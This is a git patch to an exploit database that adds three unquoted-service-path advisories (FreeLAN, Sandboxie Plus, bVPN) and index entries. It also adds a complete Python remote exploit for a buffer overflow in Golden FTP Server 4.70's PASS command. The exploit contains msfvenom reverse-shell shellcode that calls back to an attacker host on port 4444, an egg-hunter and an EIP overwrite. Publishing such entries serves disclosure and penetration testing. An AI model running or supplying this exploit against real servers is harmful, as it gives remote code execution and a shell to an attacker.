From 9a9ff3d28813fdf5cc925f8e4dc0875bd69b888b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 10 Mar 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-03-10 4 changes to exploits/shellcodes FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) --- exploits/windows/local/49630.txt | 30 ++++++++++++ exploits/windows/local/49631.txt | 29 ++++++++++++ exploits/windows/local/49632.txt | 28 +++++++++++ exploits/windows/remote/49629.py | 81 ++++++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 172 insertions(+) create mode 100644 exploits/windows/local/49630.txt create mode 100644 exploits/windows/local/49631.txt create mode 100644 exploits/windows/local/49632.txt create mode 100755 exploits/windows/remote/49629.py diff --git a/exploits/windows/local/49630.txt b/exploits/windows/local/49630.txt new file mode 100644 index 000000000..47849031e --- /dev/null +++ b/exploits/windows/local/49630.txt @@ -0,0 +1,30 @@ +# Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path +# Date: 2021-1-20 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: www.freelan.org +# Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe +# Version: Version 2.2 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc "FreeLAN Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FreeLAN Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\FreeLAN\bin\freelan.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : FreeLAN Service + DEPENDENCIES : tap0901 + : Dhcp + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49631.txt b/exploits/windows/local/49631.txt new file mode 100644 index 000000000..c857f4586 --- /dev/null +++ b/exploits/windows/local/49631.txt @@ -0,0 +1,29 @@ +# Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path +# Date: 2021-1-20 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: sandboxie-plus.com +# Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe +# Version: Version 0.7.2 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc SbieSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SbieSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Sandboxie-Plus\SbieSvc.exe + LOAD_ORDER_GROUP : UIGroup + TAG : 0 + DISPLAY_NAME : Sandboxie Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49632.txt b/exploits/windows/local/49632.txt new file mode 100644 index 000000000..6fbcf8eb9 --- /dev/null +++ b/exploits/windows/local/49632.txt @@ -0,0 +1,28 @@ +# Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path +# Date: 2021-1-19 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: https://carolcoral.github.io/no-free_vpn/ +# Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe +# Version: Version 2.5.1 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc "waselvpnserv" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: waselvpnserv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : waselvpnserv + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/remote/49629.py b/exploits/windows/remote/49629.py new file mode 100755 index 000000000..18b06ff96 --- /dev/null +++ b/exploits/windows/remote/49629.py @@ -0,0 +1,81 @@ +# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) +# Author: 1F98D +# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) +# Tested on Windows 10 (x64) +# +# A buffer overflow exists in GoldenFTP during the authentication process. +# Note that the source ip address of the user performing the authentication +# forms part of the buffer and as such must be accounted for when calculating +# the appropriate offset. It should also be noted that the exploit is +# rather unstable and if exploitation fails, GoldenFTP will be left in +# a state where it will still accept connections, but it will be unable +# to handle or process them in anyway, so be careful. +# +#!/usr/local/bin/python3 + +from socket import * +import sys + +# Your address forms part of the buffer length calculation +SOURCE = '192.168.1.1' +TARGET = '192.168.1.2' +s = socket(AF_INET, SOCK_STREAM) +s.connect((TARGET, 21)) + +# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444 +buf = b"" +buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29" +buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48" +buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71" +buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a" +buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38" +buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf" +buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7" +buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a" +buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9" +buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b" +buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a" +buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe" +buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc" +buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5" +buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83" +buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63" +buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16" +buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4" +buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde" +buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3" +buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e" +buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06" +buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc" +buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96" +buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1" +buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e" +buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6" + +total_length = 545-len(SOURCE) +eip = b'\x7f\x79\x4c\x00' +hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset base on source ip +hunter += b'\xfd' # std ; set df flag so we search high to low +hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg +hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi +hunter += b'\x47' # inc edi +hunter += b'\x90' # nop +hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1 +hunter += b'\xaf' # scasd ; check for egg at edi +hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3 +hunter += b'\x83\xC7\x03' # add edi, 0x3 +hunter += b'\xaf' # scasd +hunter += b'\x75\xfa' # short jnz -0x6 +hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter +hunter += b'\xff\xe7' # jmp edi ; egg found, let's go! +hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again + +payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip + +s.send(b'USER anonymous\r\n') +print(s.recv(1024)) +print(s.recv(1024)) +s.send(b'PASS ' + payload + b'\r\n') +print(s.recv(1024)) +s.send(b'QUIT\r\n') +print(s.recv(1024)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 56d2d3729..0c273983f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11277,6 +11277,9 @@ id,file,description,date,author,type,platform,port 49623,exploits/windows/local/49623.txt,"Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, 49624,exploits/windows/local/49624.txt,"Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, 49626,exploits/windows/local/49626.txt,"Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, +49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, +49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, +49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18396,6 +18399,7 @@ id,file,description,date,author,type,platform,port 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows, 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java, +49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,